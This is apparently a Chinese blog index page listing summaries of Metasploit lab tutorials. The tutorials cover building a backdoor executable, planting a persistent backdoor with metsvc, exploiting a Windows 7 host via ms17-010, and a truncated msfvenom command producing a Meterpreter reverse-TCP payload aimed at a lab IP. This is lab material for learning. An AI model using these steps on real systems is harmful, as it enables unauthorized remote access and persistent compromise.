随笔分类 - msf
摘要:一、msf生成后门并获得会话 攻击机ip:192.168.3.147 靶机ip:192.168.3.142 先生成一个exe的运行程序,并上传至靶机运行,然后用kali监听 二、执行命令植入后门 在kali获得的会话中运行 run metsvc A,完成后门植入 去靶机下查看目标文件夹发现上传成功
阅读全文
摘要:攻击机:kali 192.168.3.139 目标机:windows7 192.168.3.130 启动msf,搜索和ms17-010相关的脚本 设置脚本,并且查看参数,这里只需要设置一下目标ip,set rhosts 192.168.3.130 然后设置监听脚本 set payload windo
阅读全文
摘要:kali : 192.168.3.136 windows server 2012 : 192.168.3.129 1、生成一个exe远控 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.3.136 LPORT=12345 -f ex
阅读全文

浙公网安备 33010602011771号